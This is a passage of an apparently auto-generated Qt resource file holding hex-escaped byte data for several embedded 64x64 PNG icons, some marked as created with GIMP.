x1c\\xb5\\xb5\\xf0\\xf9\\x7c\\xe0\\x79\\x1e\\x86\\x61\\x40\\x55\\\n\\x55\\x50\\x4a\\xd3\\xf6\\xe4\\x95\\x90\\x07\\xb2\\x26\\x40\\x89\\x46\\xe1\\xf3\\\n\\xf9\\x40\\x29\\x5d\\x54\\x97\\xf3\\x3c\\x8f\\xed\\xdb\\xb7\\xaf\\x7c\\x05\\x1c\\\n\\x39\\x72\\x04\\x4e\\xa7\\x13\\x9a\\xa6\\x25\\x08\\x60\\x8c\\x81\\x10\\x82\\x86\\\n\\x86\\x86\\x95\\x4d\\x80\\x66\\x18\\x70\\xb9\\x5c\\xb0\\xd9\\x6c\\x8b\\xbc\\xcf\\\n\\x18\\x83\\xaa\\xaa\\x70\\xae\\xf4\\x1c\\xd0\\xd3\\xd3\\x03\\xbb\\xdd\\x0e\\xc3\\\n\\x30\\x52\\xf6\\xe8\\x92\\x24\\x21\\xf8\\xf8\\xf1\\xca\\x24\\xe0\\xf1\\xf4\\x34\\\n\\x9a\\x9b\\x9b\\xdf\\x2b\\x21\\x69\\x22\\x1b\\x37\\x5d\\xd7\\x51\\x5d\\x5d\\x8d\\\n\\xf6\\xf6\\xf6\\xb2\\xea\\xf3\\x73\\x22\\x40\\x51\\x94\\xb4\\x73\\x01\\xa9\\xae\\\n\\x0e\\xf3\\xf3\\xf3\\x4b\\x2e\\xd4\\x6a\\xb5\\x62\\x78\\x78\\x18\\xba\\xae\\xe7\\\n\\x3e\\x90\\x58\\x50\\x91\\x61\\x18\\x25\\x21\\x23\\xa1\\x80\\x50\\x28\\x94\\x92\\\n\\x84\\xc6\\xc6\\x46\\xd4\\xd5\\xd5\\xa5\\xf4\\x7e\\xdc\\x62\\xb1\\x18\\x08\\x21\\\n\\xa8\\xb2\\xdb\\xf3\\x9b\\xca\\x70\\x1c\\x38\\x8e\\x2b\\x9d\\x02\\xd6\\xac\\x59\\\n\\xc3\\xdc\\x6e\\x77\\x4a\\xfa\\x9d\\x4e\\x27\\x0c\\xc3\\x00\\x21\\xe9\\xa3\\x45\\\n\\xd7\\x75\\x58\\x2c\\x16\\x78\\xbd\\xde\\xbc\\x17\\x12\\x27\\x40\\xd7\\xf5\\xff\\\n\\xe5\\x9a\\x92\\xe6\\x80\\xe6\\xe6\\xe6\\x8c\\x0b\\xe2\\x38\\x0e\\xba\\xae\\xa3\\\n\\xb5\\xb5\\x15\\xaf\\x32\\x1c\\x5b\\x65\\xba\\x0e\\xcf\\xf3\\x45\\xcd\\x0d\\x19\\\n\\x09\\xb8\\x7b\\xf7\\x2e\\x04\\x41\\xc8\\xca\\x2b\\x35\\x35\\x35\\x38\\x73\\xe6\\\n\\x0c\\x66\\x66\\x67\\x33\\x26\\xbe\\xa5\\x00\\xc6\\xf3\\x42\\x3c\\xec\\x0a\\x41\\\n\\x46\\x7c\\x3e\\x98\\x91\\x80\\x58\\x2c\\x06\\x4d\\xd3\\x12\\x9e\\x49\\x67\\x86\\\n\\x61\\x40\\x51\\x14\\x54\\x57\\x57\\x63\\x70\\x70\\x10\\xa1\\xb9\\xb9\\xac\\x24\\\n\\x9f\\xee\\x37\\x42\\x48\\x22\\xec\\x0a\\x99\\x1f\\x48\\x2a\\x56\\x92\\xed\\xd1\\\n\\xa3\\x47\\x89\\x2c\\x9d\\x8d\\x89\\xa2\\x88\\x8e\\x8e\\x0e\\x74\\xee\\xda\\x95\\\n\\x17\\xf8\\x45\\x8b\\x23\\xa4\\xf4\\x21\\xf0\\xec\\xd9\\x33\\x84\\xc3\\x61\\x08\\\n\\x42\\x76\\x8d\\x23\\x63\\x0c\\xb5\\xb5\\xb5\\xe8\\xef\\xef\\xc7\\xa7\\xf5\\xf5\\\n\\x65\\x59\\xfc\\x24\\x3b\\x3a\\x23\\x01\\x0d\\xf5\\xf5\\x88\\x44\\x22\\x10\\x45\\\n\\x31\\x2b\\xcf\\x31\\xc6\\x20\\xcb\\x32\\x44\\x51\\xc4\\xf1\\xe3\\xc7\\xd1\\xb6\\\n\\x6d\\x5b\\x65\\x55\\x82\\xa9\\xc2\\x60\\x74\\x74\\x14\\x4f\\x9f\\x3e\\xcd\\x98\\\n\\x07\\x92\\x25\\xae\\x69\\x1a\\x04\\x41\\x40\\x77\\x77\\x37\\x5a\\xd2\\x9c\\xe3\\\n\\x57\\x4c\\x2f\\xe0\\x76\\xb9\\x70\\xf3\\xe6\\xcd\\x9c\\xe3\\x32\\x1a\\x8d\\x82\\\n\\x10\\x82\\xfe\\xfe\\x7e\\x7c\\x73\\xe2\\x04\\xd4\\x0f\\x2a\\xc5\\x52\\x97\\xc1\\\n\\x39\\xb5\\xc3\\x63\\x63\\x63\\x78\\xf3\\xe6\\x0d\\xac\\x56\\x6b\\x4e\\x07\\x95\\\n\\x9a\\xa6\\x41\\x51\\x14\\x48\\x92\\x84\\xe1\\xe1\\x61\\xb8\\x3d\\x9e\\xc4\\x36\\\n\\x59\\x8a\\xea\\xef\\x43\\x85\\xe7\\x74\\x36\\x38\\x1b\\x0a\\xe1\\xf4\\xe9\\xd3\\\n\\x68\\x5a\\x98\\xff\\x25\\x3f\\xc6\\x92\\x4d\\x46\\xb7\\x5a\\xad\\x00\\x80\\x7b\\\n\\xf7\\xee\\x61\\x62\\x62\\x02\\xb7\\x6f\\xdf\\x86\\xbd\\xaa\\xaa\\x3c\\x09\\x48\\\n\\x47\\x02\\x08\\xc1\\xe0\\xe0\\x20\\x36\\x6f\\xde\\x0c\\x55\\x55\\xa1\\xaa\\x6a\\\n\\xd6\\x61\\xc1\\x18\\x83\\x28\\x8a\\x10\\x04\\x01\\x2f\\x5e\\xbc\\xc0\\xe4\\xe4\\\n\\x24\\xae\\x05\\x02\\x25\\x03\\x0f\\x00\\x4b\\x66\\xb5\\x4e\\xaf\\xf7\\xfb\\x14\\\n\\x28\\xf0\\x67\\x20\\x00\\x51\\x14\\xb1\\x6e\\xdd\\x3a\\x50\\x4a\\xb3\\x0a\\x09\\\n\\x42\\x08\\x78\\x9e\\x87\\xc5\\x62\\xc1\\xd4\\xd4\\x14\\x2e\\x5d\\xba\\x04\\xbf\\\n\\xdf\\x0f\\x47\\x9e\\x0d\\x94\\x19\\xe0\\x33\\x2a\\x20\\xad\\x0a\\x16\\xec\\x9f\\\n\\xe7\\xcf\\xd1\\xd7\\xd7\\x87\\x96\\x96\\x16\\xd4\\x2f\\xec\\xf9\\xaa\\xaa\\x82\\\n\\xe7\\x79\\x68\\x9a\\x96\\xd8\\x3a\\x19\\x63\\x50\\x14\\x05\\xe1\\x70\\x18\\xc1\\\n\\x60\\x10\\x17\\x2e\\x5c\\xc0\\xc6\\x0d\\x1b\\x4a\\x2a\\x7d\\x53\\x08\\x00\\x80\\\n\\xf9\\x68\\x14\\xca\\xfc\\x3c\\xdc\\x6e\\x37\\xbc\\x5e\\x2f\\x24\\x49\\x02\\xcf\\\n\\xf3\\x70\\xb9\\x5c\\x98\\x9e\\x9e\\xc6\\xdb\\xb7\\x6f\\x71\\xe7\\xce\\x1d\\xcc\\\n\\xce\\xce\\xe2\\xdf\\x48\\x04\\x92\\x24\\x95\\x3c\\xf1\\xe5\\x44\\x40\\x36\\x24\\\n\\xa4\\x22\\xc5\\xb6\\x90\\xf0\\xca\\xa9\\xea\\xcb\\x7b\\x1b\\xcc\\xf5\\x39\\xdc\\\n\\x72\\x01\\xff\\xf9\\xfe\\xfd\\x1e\\xd3\\xea\\x80\\x62\\xbc\\xbd\\x61\\xb6\\x75\\\n\\x75\\x75\\xfd\\x9d\\xb1\\x6a\\xcd\\xf5\\xa2\\x95\\x72\\x7c\\x9e\\xad\\xc3\\xca\\\n\\xf6\\x61\\xe9\\x7c\\x6d\\x67\\x67\\xe7\\xee\\x03\\x07\\x0e\\x5c\\xcf\\x7a\\x0a\\\n\\x95\\xef\\x8d\\xca\\x91\\x84\\xfe\\x81\\x01\\xd2\\xda\\xda\\x9a\\xd5\\xba\\x64\\\n\\x59\\xe6\\x28\\xa5\\xac\\x6c\\x5f\\x98\\xc8\\xd5\\xbe\\x3d\\x79\\x92\\xd8\\xed\\\n\\x76\\x88\\xa2\\xc8\\x32\\x01\\x8f\\xe7\\x3f\\x4a\\xa9\\x5e\\xb0\\x57\\x66\\x92\\\n\\x2b\\xc3\\x42\\x36\\x3d\\xbe\\x43\\x87\\xc8\\x96\\x2d\\x5b\\x12\\x9f\\x33\\x3d\\\n\\xf7\\x2c\\xcb\\x32\\xc1\\xfb\\x77\\x8e\\x38\\x4a\\xa9\\x61\\xea\\xca\\x92\\x89\\\n\\x88\\x8f\\xd1\\xe2\\xf3\\xbd\\x52\\x26\\xba\\x14\\xde\\x4f\\x90\\x55\\x10\\xd7\\\n\\x14\\x3a\\x34\\xcc\\xdc\\x92\\x0b\\xbe\\xb7\\x9b\\x45\\x46\\xc5\\xbc\\x38\\x69\\\n\\x16\\x19\\x95\\x58\\x78\\x7d\\xb4\\x4a\\xb4\\xff\\x00\\x22\\xd0\\x8f\\xeb\\xba\\\n\\x12\\x56\\x69\\x00\\x00\\x00\\x00\\x49\\x45\\x4e\\x44\\xae\\x42\\x60\\x82\\\n\\x00\\x00\\x08\\x44\\\n\\x89\\\n\\x50\\x4e\\x47\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0d\\x49\\x48\\x44\\x52\\x00\\\n\\x00\\x00\\x40\\x00\\x00\\x00\\x40\\x08\\x06\\x00\\x00\\x00\\xaa\\x69\\x71\\xde\\\n\\x00\\x00\\x00\\x06\\x62\\x4b\\x47\\x44\\x00\\xff\\x00\\xff\\x00\\xff\\xa0\\xbd\\\n\\xa7\\x93\\x00\\x00\\x00\\x09\\x70\\x48\\x59\\x73\\x00\\x00\\x0b\\x13\\x00\\x00\\\n\\x0b\\x13\\x01\\x00\\x9a\\x9c\\x18\\x00\\x00\\x00\\x07\\x74\\x49\\x4d\\x45\\x07\\\n\\xe5\\x03\\x1d\\x15\\x3a\\x03\\xc9\\xc3\\x3b\\x5b\\x00\\x00\\x00\\x1d\\x69\\x54\\\n\\x58\\x74\\x43\\x6f\\x6d\\x6d\\x65\\x6e\\x74\\x00\\x00\\x00\\x00\\x00\\x43\\x72\\\n\\x65\\x61\\x74\\x65\\x64\\x20\\x77\\x69\\x74\\x68\\x20\\x47\\x49\\x4d\\x50\\x64\\\n\\x2e\\x65\\x07\\x00\\x00\\x07\\xa8\\x49\\x44\\x41\\x54\\x78\\xda\\xd5\\x9b\\x59\\\n\\x6c\\x94\\x55\\x14\\xc7\\x7f\\xf3\\x4d\\x77\\x5a\\xba\\xb7\\x0a\\x42\\x15\\xa4\\\n\\xad\\x52\\x41\\x81\\x28\\x31\\x4a\\x8c\\xa0\\x89\\x0b\\x1a\\xf7\\xb8\\xef\\x3e\\\n\\x18\\xb7\\xe8\\x83\\x0f\\x68\\xd4\\xf8\\xa4\\x71\\x89\\xcb\\x93\\xbb\\xe2\\x9e\\\n\\xb8\\x05\\xb7\\x04\\x7d\\xd0\\x1a\\x43\\x50\\x89\\xa5\\x2d\\xb6\\x45\\xc5\\xd2\\\n\\x50\\xed\\x62\\x3b\\x43\\xcb\\xd7\\x99\\x76\\x66\\xea\\xc3\\xf9\\x86\\x8e\\x65\\\n\\xe6\\xde\\xfb\\x0d\\x33\\x5f\\x87\\x7f\\x72\\x93\\x2e\\xf7\\xbb\\xf7\\x9c\\x73\\\n\\xef\\x3d\\xdb\\x3d\\xd7\\x47\\xf6\\x51\\x0b\\x9c\\x09\\x2c\\x07\\x9a\\x80\\x46\\\n\\xe7\\x6f\\x65\\x4e\\x03\\x18\\x73\\xda\\x10\\xd0\\x03\\x74\\x03\\x9d\\xc0\\xf7\\\n\\xc0\\x30\\x47\\x20\\xd6\\x00\\x4f\\x03\\x3b\\x81\\x18\\x30\\x9d\\x66\\x8b\\x01\\\n\\xbf\\x02\\x4f\\x02\\x27\\xe7\\x3a\\xd3\\x65\\xc0\\x03\\xce\\xca\\x4d\\x67\\xa9\\\n\\xb5\\x01\\xf7\\x02\\xf3\\x72\\x89\\xf1\\x4a\\xe0\\x31\\x60\\x24\\x8b\\x8c\\xcf\\\n\\x6e\\x43\\xc0\\x43\\x40\\xf9\\x5c\\x32\\xee\\x03\\x6e\\x71\\x88\\x99\\x9e\\xa3\\\n\\x36\\x00\\xdc\\xe8\\xd0\\xe2\\x29\\x96\\x02\\xad\\x73\\xc8\\xf8\\xec\\xd6\\x0a\\\n\\x2c\\xf1\\x8a\\xf9\\x2b\\x80\\x60\\x0e\\x31\\x1f\\x6f\\x01\\xe0\\xd2\\x6c\\x6f\\\n\\xf9\\xa7\\x72\\x90\\xf1\\xd9\\xed\\x09\\x37\\x47\\xc2\\xb4\\x63\\x3e\\xf0\\x06\\\n\\x70\\x4d\\x5a\\xa2\\xcb\\xb7\\xa0\\xa9\\x1c\\x96\\x95\\x43\\x7d\\x31\\xd4\\x14\\\n\\x41\\x49\\x1e\\x14\\xfa\\xe5\\xff\\xe1\\x28\\xd8\\x11\\x18\\x0e\\xc1\\xc0\\x04\\\n\\xec\\x0e\\x42\\x77\\x10\\xa6\\x62\\xe9\\x2e\\xd6\\x66\\x47\\x3f\\x45\\x32\\x21\\\n\\x80\\x7c\\xe0\\x13\\xe0\\x02\\x57\\x24\\x14\\xfb\\xe1\\xa4\\x2a\\x69\\xcd\\x15\\\n\\x50\\xe0\\x77\\xc7\\xc2\\x64\\x14\\xba\\x02\\xd0\\x3e\\x22\\x6d\\x22\\xea\\x56\\\n\\x08\\x5f\\x00\\x97\\x00\\x53\\xaa\\x4e\\x4a\\xaa\\x36\\x6d\\xda\\x64\\xb5\\xb6\\\n\\xb6\\xbe\\x05\\x5c\\x66\\x3c\\x6d\\x81\\x05\\xeb\\x17\\xc2\\x2d\\x4d\\xb0\\xaa\\\n\\x16\\xea\\x4b\\xc0\\x6f\\xb9\\x5f\\x43\\xbf\\x25\\xdf\\xae\\xa8\\x86\\x33\\x8e\\\n\\x92\\xa5\\xea\\x3b\\x00\\xb1\\x69\\xd3\\x11\\x1a\\x81\\x63\\x81\\x4f\\x8d\\x77\\\n\\x80\\x6d\\xdb\\x07\\x7f\\x2f\\x29\\x29\\x99\\x76\\xce\\xfc\\x03\\x46\\xd3\\x59\\\n\\xc0\\xda\\x7a\\x38\\x6f\\x11\\xcc\\x2f\\xc8\\x8e\\x16\\x0a\\x4e\\xc2\\xd7\\x7d\\\n\\xb0\\x6d\\x40\\x7c\\x44\\x33\\x3c\\x09\\x3c\\xa8\\x14\\x40\\x12\\xc6\\xe3\\xda\\\n\\xfe\\x43\\xa3\\x29\\xca\\x0b\\xe0\\xf6\\x66\\x58\\x54\\xea\\x8d\\x1d\\xea\\x1b\\\n\\x87\\x97\\xbb\\x44\\x20\\x66\\xb8\\x0c\\xf8\\xd8\\x8d\\x0e\\x58\\x0a\\xec\\x00\\\n\\xe6\\x6b\\x87\\x6e\\x28\\x85\\xdb\\x9a\\xb3\\xb7\\xea\\xa9\\xb0\\x7f\\x12\\x5e\\\n\\xe9\\x82\\xde\\x71\\xa3\\xbd\\x03\\x9c\\x02\\xec\\x31\\xd1\\x01\\x3e\\xe0\\x33\\\n\\x60\\x99\\x3e\\xe4\\xa9\\x11\\xe6\\x8b\\xf3\\xbc\\xf7\\x43\\x0b\\xfd\\xb0\\xa6\\\n\\x16\\x46\\x42\\xd0\\x6f\\xeb\\x7a\\x17\\x01\\xab\\x81\\xd7\\x4d\\x04\\x70\\x33\\\n\\x70\\xb7\\x11\\xf3\\xd7\\x37\\x82\\xe5\\x63\\xce\\xe0\\xf7\\xc1\\xca\\x6a\\x18\\\n\\x9a\\x80\\xbf\\xb5\\x42\\x58\\xec\\xec\\x80\\x36\\xd5\\x11\\xa8\\x74\\xe2\\xf1\\\n\\x1a\\xed\\xb6\\xbf\\xa7\\x05\\xf2\\x2c\\x72\\x02\\x53\\x31\\x78\\xa1\\xc3\\xe4\\\n\\x38\\x0c\\x3a\\xd6\\x21\\x98\\xa8\\xbb\\x13\\x71\\xaf\\x96\\xf9\\xf2\\x02\\xd9\\\n\\xf6\\xb9\\xc2\\x7c\\xdc\\xd1\\xba\\xad\\x59\\x68\\x53\\xa3\\x0e\\xb8\\x2b\\xd5\\\n\\x0e\\x28\\x03\\x7a\\x9d\\x5d\\x90\\xda\\xd4\\xdd\\xbf\\xc2\\x3b\\x6d\\x9f\\x8e\\\n\\x75\\x78\\x66\\xa7\\xce\\x44\\x0e\\x3b\\xfe\\xc1\\x81\\xd9\\x3b\\xe0\\x0e\\x25\\\n\\xf3\\x38\\x76\\x3e\\x57\\x99\\x07\\xa1\\x6d\\x6d\\xbd\\xae\\x57\\x0d\\x70\\x6b\\\n\\xb2\\x1d\\xd0\\x09\\x9c\\xa8\\xf4\\xf0\\x1e\\x5e\\xe5\\xad\\xb9\\x1b\\x9c\\x80\\\n\\x2d\\xbd\\xe2\\x12\\x03\\x34\\x96\\xc3\\x45\\x0d\\xe2\\x21\\xaa\\x9c\\xa5\\xc7\\\n\\x77\\xe8\\xe2\\x88\\x9d\\xc0\\xca\\xc4\\x1d\\xb0\\x46\\xc9\\x3c\\xc0\\x59\\x0b\\\n\\xbc\\x65\\xbe\\xff\\x00\\x3c\\xdb\\x0e\\x3b\\x47\\x60\\x32\\x26\\xad\\x63\\x54\\\n\\xfe\\x36\\x60\\xab\\x75\\xd4\\x59\\x47\\xeb\\x46\\x5f\\x31\\x5b\\x00\\x57\\x6b\\\n\\x03\\x9b\\xf5\\x0b\\xbd\\x63\\x7e\\x6c\\x12\\x5e\\xea\\x92\\x08\\x71\\x36\\x26\\\n\\xa2\\xb0\\x65\\xaf\\xfa\\xfb\\x0d\\x0b\\x85\\x66\\x35\\xae\\x49\\x14\\xc0\\x39\\\n\\xca\\xae\\x27\\x55\\x41\\x91\\xdf\\x1b\\xe6\\x23\\x31\\x78\\xb5\\x1b\\x46\\xc3\\\n\\xa9\\xfb\\xf4\\x04\\x34\\x6e\\x4f\\x1e\\xb4\\x54\\xe9\\x66\\x3a\\x37\\x2e\\x80\\\n\\x5a\\xa0\\x45\\x2b\\x00\\xaf\\xf0\\xfe\\x1f\\xb0\\x67\\xec\\xf0\\xc7\\xd1\\xd3\\\n\\xbc\\x12\\xa8\\xb6\\x90\\x4b\\x0b\\x9f\\xd2\\xc6\\x36\\x57\\x78\\xc3\\xfc\\x37\\\n\\xfb\\xe0\\xa7\\x21\\x7d\\xbf\\x26\\x03\\x7a\\x4e\\xa8\\x10\\xda\\xd5\\x91\\xf0\\\n\\x3a\\x0b\\xb9\\xb1\\x51\\x4c\\x56\\xee\\x3e\\x99\\x91\\x0e\\x3a\\x46\\xe0\\xf3\\\n\\x5e\\xb3\\x7c\\xc3\\xc6\\x06\\x83\\x7e\\x7e\\xa1\\x5d\\x8d\\xe5\\x16\\x72\\x5d\\\n\\x95\\x1a\\xcb\\x3c\\x48\\xbd\\xf7\\x1f\\x80\\x37\\x7b\\x24\\xa3\\xa7\\x5b\\xb3\\\n\\x1b\\x1b\\xa1\\xae\\xd8\\x6c\\x5c\\x3d\\xed\\x4d\\x79\\x8e\\x6f\\x9c\\x1a\\xf5\\\n\\xc5\\xe6\\x8c\\xfc\\x1b\\x82\\x2f\\xf7\\x42\\x4f\\x10\\xa2\\xd3\\xb2\\x0d\\x37\\\n\\x36\\x40\\x45\\x61\\xea\\x6f\\xc6\\xa7\\x44\\xe3\\x4f\\x1a\\x64\\x38\\x2e\\x6c\\\n\\x30\\x51\\x6e\\x09\\x8e\\xaf\\x96\\xf6\\xc6\\x3c\\x47\\x09\\x2a\\xfc\\xa6\\x22\\\n\\xb3\\xc9\\x02\\x61\\x78\\xa6\\x5d\\x18\\x8a\\xe3\\xe7\\x61\\x49\\x6e\\xde\\x79\\\n\\x22\\x2c\\x98\\x97\\x5c\\xe3\\xbf\\xd2\\xa5\\xd6\\xf8\\x71\\x9c\\x5a\\x2b\\xe6\\\n\\xcd\\x0d\\x6a\\xb5\\xb4\\xd7\\x5a\\xcc\\xdc\\xd0\\x26\\x47\\x89\\x61\\xac\\xbf\\\n\\xa5\\xf7\\xff\\xcc\\x1f\\xb4\\xe9\\xce\\x0a\\x8f\\x25\\xc9\\xde\\x7c\\x60\\xa8\\\n\\xf1\\x8f\\x2b\\x83\\xab\\x96\\xba\\x3f\\x5a\\xfa\\x3c\\x45\\x99\\x5e\\x00\\x85\\\n\\x86\\x0a\\xf0\\x37\\x85\\x6d\\x1e\\x0d\\x8b\\x6d\\x8f\\x24\\x6c\\xf3\\x6f\\xf7\\\n\\xc1\\x76\\x03\\x8d\\x5f\\x55\\x98\\x7e\\xf4\\xa9\\xf7\\x5d\\xe6\\x67\\x2e\\xa6\\\n\\xf5\\x6b\\x12\\x23\\x7b\\xc6\\x64\\xc5\\xe3\\x1a\\x7f\\x8b\\x81\\xc6\\x2f\\xb4\\\n\\x24\\xd7\\x58\\x9a\\x9f\\x35\\xfd\\x9b\\x87\\x14\\x26\\x54\\xa7\\xec\\x11\\x8e\\\n\\x9a\\x49\\xbf\\xb1\\x5c\\xce\\xbc\\x0a\\xdb\\x87\\xc4\\x3c\\xfd\\x34\\x68\\xa6\\\n\\xf1\\x6f\\x68\\x4c\\xae\\x3b\\x4c\\x11\\xd2\\xde\\x25\\xec\\xb7\\x1c\\x01\\xa4\\\n\\x86\\x1d\\x31\\x9b\\xec\\xfc\\xc5\\x62\\xa3\\x75\\xf8\\xe1\\x1f\\x08\\x1b\\x68\\\n\\xfc\\x8d\\x2e\\x35\\x7e\\x32\\x4c\\x68\\x69\\x1f\\xb3\\x90\\xeb\\x6d\\x45\\xfa\\\n\\x20\\x64\\x36\\x59\\x75\\x91\\xac\\x58\\x26\\x52\\x84\\xa7\\xd6\\x66\\x26\\xf8\\\n\\x1a\\xd2\\xd2\\x3e\\x64\\x21\\x39\\xc0\\xd4\\x18\\x98\\x70\\xe7\\x7f\\x5f\\xb8\\\n\\xf8\\xf0\\x88\\x5e\\x92\\xa6\\xc6\\x4f\\x95\\x4f\\x50\\xa3\\xc7\\x42\\x0a\\x92\\\n\\x52\\x63\\x77\\xd0\\xdd\\xa4\\x1b\\x8e\\x91\\x15\\x4c\\x07\\x55\\x85\\x70\\x6b\\\n\\x06\\xf3\\x8d\\x3d\\x5a\\xda\\xbb\\x2d\\x27\\x13\\xa4\\xe8\\x12\\x94\\x8b\\x4a\\\n\\x37\\xb8\\x6a\\xa9\\xd8\\x6e\\x37\\xc8\\xb4\\xc6\\x0f\\x47\\xa1\\x3b\\xa0\\xeb\\\n\\xb5\\xcb\\x62\\xa6\\xd2\\x23\\x39\\xa6\\x62\\x33\\x29\\x29\\x63\\xdb\\xe2\\x64\\\n\\x69\\x2b\\x0b\\xcd\\xfa\\xc7\\x7d\\xfc\\x05\\x19\\xac\\x7d\\xea\\x0a\\x40\\x44\\\n\\x69\\x6a\\xa6\\x81\\xef\\xe3\\x4a\\xb0\\x43\\x39\\x58\\xfb\\x88\\x7b\\x02\\x4a\\\n\\xf3\\xe1\\x8e\\x66\\x33\\xcb\\x70\\x51\\x03\\x2c\\xcf\\x70\\xce\\x41\\x4f\\x73\\\n\\x3b\\x30\\x1c\\xa7\\x6e\\xab\\x76\\xb0\\x50\\xc4\\x3d\\x11\\x0b\\xe6\\xc9\\xca\\\n\\xaa\\x2c\\xc3\\x69\\x75\\x70\\x76\\x86\\xd3\\x6d\\xa1\\x88\\x38\\x5b\\x9a\\xec\\\n\\x43\\x62\\x4a\\xec\\x3d\\xb5\\x3d\\x8d\\xc2\\xb7\\xfd\\xe9\\x11\\xd3\\x52\\x05\\\n\\x97\\x1e\\x97\\x5c\\x08\\xcd\\x15\\x70\\x65\\x16\\x6a\\x9b\\xb6\\xee\\x33\\x29\\\n\\xa8\\x78\\x17\\x66\\xee\\x06\\xfb\\x81\\x2b\\x95\\x91\\xe1\\xde\\x71\\x58\\x5b\\\n\\x67\\x1e\\x1b\\x24\\xa2\\xa1\\x0c\\x8e\\x2d\\x93\\x94\\xb5\\x1d\\x91\\x30\\x75\\\n\\xdd\\xd1\\xc2\\xbc\\x3f\\xc3\\x37\\x4c\\x81\\x30\\x6c\\xde\\xad\\x2b\\xa4\\xe8\\\n\\x04\\x1e\\x8e\\xbb\\xc2\\x71\\xbc\\x86\\x14\\x44\\xa4\\x56\\x86\\x5f\\xf5\\xa5\\\n\\x6f\\xa3\\x9b\\x2b\\xbc\\x49\\xad\\x7d\\xd9\\x67\\x52\\x5b\\xf4\\x5a\\xfc\\x87\\\n\\x44\\xf1\\xbf\\x04\\x8c\\x2a\\x3f\\xdb\\x36\\x20\\xd7\\x4f\\xb9\\x8a\\xbf\\xc6\\\n\\x60\\xfb\\xa0\\xae\\xd7\\x88\\xc3\\xeb\\x21\\x02\\x18\\x03\\x9e\\x57\\x7e\\x1a\\\n\\x43\\x2a\\x33\\xf6\\x4f\\xe6\\x1e\\xf3\\x81\\x30\\xbc\\xda\\xa5\\x0f\\xb2\\x84\\\n\\xc7\\xf1\\x44\\x0b\\x9c\\x88\\x4a\\xc7\\x33\\x54\\xbb\\x72\\x0d\\xa5\\x70\\x77\\\n\\x8b\\x2e\\xeb\\xea\\x1d\\xa6\\x62\\xf0\\x5c\\xbb\\x14\\x51\\x69\\x7c\\x7f\\x24\\\n\\x05\\x78\\xd0\\xb1\\x99\\xad\\xd1\\x42\\xc8\\xed\\xe9\\xc5\\xca\\x61\\x82\\x93\\\n\\x52\\x99\\xb1\\xb2\\x3a\\x37\\x04\\xf0\\xce\\x6e\\xe8\\x32\\x72\\xd9\\xef\\x02\\\n\\xb6\\xfd\\x2f\\x8d\\x91\\xa4\\x53\\x1b\\xb0\\x1e\\xa9\\xa8\\x48\\x8d\\x7e\\x1b\\\n\\x86\\x27\\x60\\x79\\xe5\\xdc\\x55\\x89\\x4c\\xc5\\x84\\xf9\\x5f\\x8c\\xde\\x54\\\n\\xfc\\x00\\xdc\\x97\\xcc\\x09\\x4d\\x1a\\x93\\x21\\x45\\x52\\xfa\\x9c\\xf8\\x5c\\\n\\x15\\x49\\x05\\xc2\\x92\\x50\\xd5\\x6f\\x7b\\x90\\x8a\\x90\\x55\\xc0\\x9f\\x87\\\n\\x24\\xb2\\x52\\x7c\\x30\\x0a\\xfc\\xee\\xf8\\x06\\x68\\x8f\\xc3\\x8e\\x61\\x38\\\n\\x7e\\xbe\\x49\\x85\\x46\\xe6\\xb4\\xfd\\x8b\\x9d\\x26\\xf1\\x7e\\x1c\\xd7\\x01\\\n\\x3f\\x26\\xfb\\x87\\xca\\xab\\xd9\\x85\\x24\\x4c\\x4f\\x37\\x8a\\xbc\\xb6\\x0d\\\n\\x88\\x30\\x16\\x95\\x66\\xef\\x22\\x35\\x10\\x86\\x8f\\xff\\x82\\x8f\\xf6\\x98\\\n\\x65\\x95\\x04\\x4f\\x03\\xcf\\xa9\\xe2\\x30\\x5d\\x9c\\xb6\\x19\\xb8\\xd6\\x98\\\n\\xc8\\x7c\\x4b\\xee\\xe7\\x37\\x2c\\x94\\x5b\\xda\\x4c\\xf9\\xf6\\x5b\\xf7\\xc1\\\n\\x77\\x7f\\xbb\\x2d\\xa0\\x7e\\x1b\\xb8\\x41\\x15\\xed\\x66\\xb7\\x58\\xba\\xc5\\\n\\x29\\x96\\x3e\\x21\\xcd\\x62\\xe9\\xdf\\x9c\\x62\\xe9\\x8e\\xec\\x15\\x4b\\x7b\\\n\\x5f\\x2e\\x5f\\x57\\x2c\\x37\\x36\\xc5\\x79\\x33\\x47\\x25\\x14\\x95\\x04\\xe6\\\n\\x50\\x48\\xd2\\x58\\x3d\\x41\\x69\\xe9\\x97\\xcb\\xbf\\x83\\xd4\\x3b\\xa6\\x64\\\n\\xde\\xb6\\x6d\\x5f\\x42\\x59\\xb0\\x71\\xda\\xe2\\x48\\x78\\x30\\xf1\\x94\\x6a\\\n\\x61\\x6d\\xdb\\xf6\\x39\\x2d\\x6d\\x45\\x75\\x39\\xb9\\xf8\\x64\\xa6\\xc8\\x3f\\\n\\xcd\\xcd\\x4d\\xda\\x15\\xb5\\x6d\\xdb\\x72\\x04\\x70\\x58\\x6e\\xec\\x12\\x8e\\\n\\xc0\\x47\\x53\\x09\\xab\\xef\\x4b\\xac\\x90\\x4f\\x17\\x3e\\xe7\\x9c\\xcd\\xe5\\\n\\xb3\\xb9\\x41\\xe0\\x26\\xe6\\xe0\\xd9\\x5c\\x22\\x2a\\x80\\x47\\xf1\\xf6\\xe1\\\n\\xe4\\xbf\\xc0\\x23\\xce\\xdc\\x39\\x83\\x32\\xe0\\x7e\\xb2\\xfb\\x74\\xb6\\xd3\\\n\\x99\\x23\\x87\\xcb\\x55\\x05\\xab\\x1d\\x0f\\xac\\x8d\\xc3\\x7f\\x3c\\xdd\\xe6\\\n\\x8c\\xb5\\x3a\\x1b\\x84\\x7a\\x71\\x76\\x6a\\x80\\x75\\x48\\x25\\xea\\xec\\xe7\\\n\\xf3\\xf1\\x17\\x29\\xfb\\x39\\xf4\\xf9\\xfc\\x2e\\x3c\\x78\\x3e\\xff\\x1f\\x06\\\n\\x63\\xd5\\xa6\\x48\\xaf\\x8b\\x93\\x00\\x00\\x00\\x00\\x49\\x45\\x4e\\x44\\xae\\\n\\x42\\x60\\x82\\\n\\x00\\x00\\x0c\\x5b\\\n\\x89\\\n\\x50\\x4e\\x47\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0d\\x49\\x48\\x44\\x52\\x00\\\n\\x00\\x00\\x40\\x00\\x00\\x00\\x40\\x08\\x06\\x00\\x00\\x00\\xaa\\x69\\x71\\xde\\\n\\x00\\x00\\x00\\x06\\x62\\x4b\\x47\\x44\\x00\\xff\\x00\\xff\\x00\\xff\\